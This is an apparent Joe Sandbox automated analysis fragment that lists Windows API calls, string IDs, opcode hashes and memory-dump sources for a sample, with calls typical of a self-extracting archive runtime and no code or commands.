                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: ba21bc2b0460c3be8be6bcae953e19ae11353784c8d7ce5e5534983d41d7e2c9
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: ba21bc2b0460c3be8be6bcae953e19ae11353784c8d7ce5e5534983d41d7e2c9
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 8ac05e37cf06d35361a0add0b66d40e70f1cd25f84de4e3ed2b0f017ac92b5a1
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: 8ac05e37cf06d35361a0add0b66d40e70f1cd25f84de4e3ed2b0f017ac92b5a1
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 5b45c1e3139d83fc5a09ba5f4d3b4a0034a962902b910c5d488dd023f8b3ca75
                                              • Instruction ID: f5ab41d3967e35fdad0d110b0a63a31df0eb095664abbd6f43bc13d61f5bbf84
                                              • Opcode Fuzzy Hash: 5b45c1e3139d83fc5a09ba5f4d3b4a0034a962902b910c5d488dd023f8b3ca75
                                              • Instruction Fuzzy Hash: EEA0019A2AE552BD310C62926E06CBA162ED4D1F61B31862BF501D6183A99128992071
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f5e86b0cec926d6ace508858db03e1d0bdac24eb494832340d90d8bd115bc584
                                              • Instruction ID: 7fb5e9c84d836d3b2d076a95e2627544dd50ccfe405221f310710caa5a41aca9
                                              • Opcode Fuzzy Hash: f5e86b0cec926d6ace508858db03e1d0bdac24eb494832340d90d8bd115bc584
                                              • Instruction Fuzzy Hash: B4A0019A2AE552BC310C62926E06CBA162ED4D5FA1B318A2BF502C6183A99128992031
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4C90
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 6a76ceb59c7f874b86f2beb8f1effa58b73153f44d8860a4bf44c235e309f2a9
                                              • Instruction ID: 414ebb3fe7c233eaad13274ae3a62b36acd3efc5cb93b9caa6e9591792b152f9
                                              • Opcode Fuzzy Hash: 6a76ceb59c7f874b86f2beb8f1effa58b73153f44d8860a4bf44c235e309f2a9
                                              • Instruction Fuzzy Hash: C2A001962AE156FC390C62926E46CBA071EC5C5FA2B328A2BF502C6583A89018952035
                                              APIs
                                              • SetDlgItemTextW.USER32(?,?,?), ref: 00C91DFC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemText
                                              • String ID:
                                              • API String ID: 3367045223-0
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB4CF1
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,00C9D115,?,?,?,?,?,?,?), ref: 00C9E8DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,00000001,00C9DE10,9CAA5719,?,00000000,00CC93B1,000000FF,?,00C9BEA6,?), ref: 00C9DE6B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              APIs
                                              • _wcslen.LIBCMT ref: 00C99CB1
                                                • Part of subcall function 00C9AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C9AC2E
                                                • Part of subcall function 00C9AC11: GetLastError.KERNEL32 ref: 00C9AC72
                                                • Part of subcall function 00C9AC11: CloseHandle.KERNEL32(?), ref: 00C9AC81
                                                • Part of subcall function 00C92F45: _wcslen.LIBCMT ref: 00C92F50
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00C99EE1
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C99F1E
                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00C9A0BF
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00C9A127
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A134
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A14A
                                              • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A18E
                                              • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,9CAA6261,00CC9937,000000FF), ref: 00C9A196
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                              • API String ID: 3517300771-3508440684
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CB163A
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CB16BB
                                              • EndDialog.USER32(?,00000006), ref: 00CB16CE
                                              • GetDlgItem.USER32(?,0000006C), ref: 00CB16EA
                                              • SetFocus.USER32(00000000), ref: 00CB16F1
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00C91DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00C91DFC
                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CB1763
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00CB1783
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00CB1826
                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CB18AD
                                                • Part of subcall function 00C91150: _wcslen.LIBCMT ref: 00C9115B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                              • String ID: %s %s$REPLACEFILEDLG
                                              • API String ID: 485132379-439456425
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              APIs
                                              • _strlen.LIBCMT ref: 00C9438C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C94523
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                              • String ID: CMT
                                              • API String ID: 2172594012-2756464174
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CB6884
                                              • IsDebuggerPresent.KERNEL32 ref: 00CB6950
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CB6970
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00CB697A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00C9952D,?,00000040,00C9931E,00000001,?,?,?,?,0000001C,00CA7618,00CDE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00C99330
                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00C9952D,?,00000040,00C9931E,00000001,?,?), ref: 00C99351
                                              • _wcslen.LIBCMT ref: 00C99360
                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00CDE0C8,?,?,00C9952D,?,00000040,00C9931E,00000001,?,?,?,?,0000001C), ref: 00C99373
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                              • String ID:
                                              • API String ID: 991192900-0
                                              APIs
                                              • VirtualQuery.KERNEL32(80000000,00CB4D59,0000001C,00CB4F4E,00000000,?,?,?,?,?,?,?,00CB4D59,00000004,00CE5D84,00CB4FDE), ref: 00CB4E25
                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CB4D59,00000004,00CE5D84,00CB4FDE), ref: 00CB4E40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: InfoQuerySystemVirtual
                                              • String ID: D
                                              • API String ID: 401686933-2746444292
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00CB535E), ref: 00CBABBC
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00CB535E), ref: 00CBABC6
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00CB535E), ref: 00CBABD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                              • Instruction ID: bcba913a55a855105cf2c9e5c46f7322d146af2abca099f71e7dbb172a31c239
                                              • Instruction Fuzzy Hash: EE021D71E001199BDF18CFA9C890BADB7F5EF49314F25826DE929E7384D731AA41CB90
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CAFD6A
                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CD9714,?,?), ref: 00CAFDB3
                                              Similarity
                                              • API ID: FormatInfoLocaleNumber
                                              • String ID:
                                              • API String ID: 2169056816-0
                                              • Opcode ID: d9233bea0f870b77e55c78417e15fab548384518388204f59039458211daca6f
                                              • Instruction ID: 5f5f6f4c86e4c9c29f96f6b18fb6624b645e319c2b2e7ebf685c3d13c981d849
                                              • Instruction Fuzzy Hash: 2F113C79221248AADB10DF60DC85BEF77F8EF08704F01542AE505A7291D670A909C765
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: CMT
                                              • API String ID: 0-2756464174
                                              • Opcode ID: 74929df6553b490665cb08ddf7ada9dc22a58d4120dfc89a0e6f5efc624d7c53
                                              • Instruction ID: cb01d52861432ee57e2163a920a9635468d16816196f432dcb61f8fedda1ea40
                                              • Instruction Fuzzy Hash: 8062C471A016499FDF09DF78C889BED7BA4BF15304F084179FC199B282DB30AA45DBA1
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CC86CD,?,?,00000008,?,?,00CC836D,00000000), ref: 00CC88FF
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: e6221e81ced9d118d74811a5a54a7d3486189d2f694d11bab6379fe6834a8a6b
                                              • Instruction ID: 5c8eccde37681bdd562148975c423edb453baaec0c1c26835eba3800478a8285
                                              • Instruction Fuzzy Hash: 11B13B355106089FD715CF28C486F667BE0FF45364F29865CE8A9CF2A1CB35EA86CB41
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CB66AA
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-0
                                              • Opcode ID: 427f5c86a20a09b8756f64836cf9c46c9b32fccb92565cf6faab8f2b7bf94d5c
                                              • Instruction ID: 01d05de38bda784612fd80ef48cddd9b6857e8b51758b1f2f738aeb75af55152
                                              • Instruction Fuzzy Hash: E85198B2A212058FEF15CF69D8C57AEBBF0FB58314F24846AC455EB2A1D7799E00CB50
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00CA03ED
                                                • Part of subcall function 00CA0469: __EH_prolog3.LIBCMT ref: 00CA0470
                                              Similarity
                                              • API ID: H_prolog3Version
                                              • String ID:
                                              • API String ID: 2775145068-0
                                              • Opcode ID: 01c33ea6c6b19b6102a2328ca6e780c2f138583e34be9c78d015f285926c3976
                                              • Instruction ID: 6e9f136dbe63802b0e361f3b125de6ba39b455ac038ea6eb2eff13e5a9e11ed6
                                              • Instruction Fuzzy Hash: 19F0A43040524D8EEB24EF70EC057DD7BA07B1B74CF204469D6162B253D7B8958DEB11
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: gj
                                              • API String ID: 0-4203073231
                                              • Opcode ID: 175c726fb586d555e857e3f7b85af814cc3203e612181033044821edc9c50e72
                                              • Instruction ID: fc6b4feee25fb6193479ba5d230c5666204aa220f110c215e40d602120c1c61b
                                              • Instruction Fuzzy Hash: 7ED1F2B2A083458FC754CF29D88065AFBE2BFC9308F59492EE998D7301D734A955CF86
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00CB6445), ref: 00CB6A10
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 2cc57ee86ea9bbeda9c8f91ddfc3fae9e250c3bb89047e6f65a068939292607b
                                              • Instruction ID: 80cce510e0d2c5cd852f9be7114603631247b8927dcae35b29f225df8f0b8f8c
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 328c37b2f5ff6fb88344f19756376498859910fd8c9bf9c0c44b51c68c6fb980
                                              • Instruction ID: 0e44746c0ffba432b010fa95441576e764d95f8e24e760f886d24a94a3653e71
                                              • Instruction Fuzzy Hash: 68A00271612241CFAB408F36EF8970E3AE9FE556D574D806DE40ACE175EB3584D1DB01
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
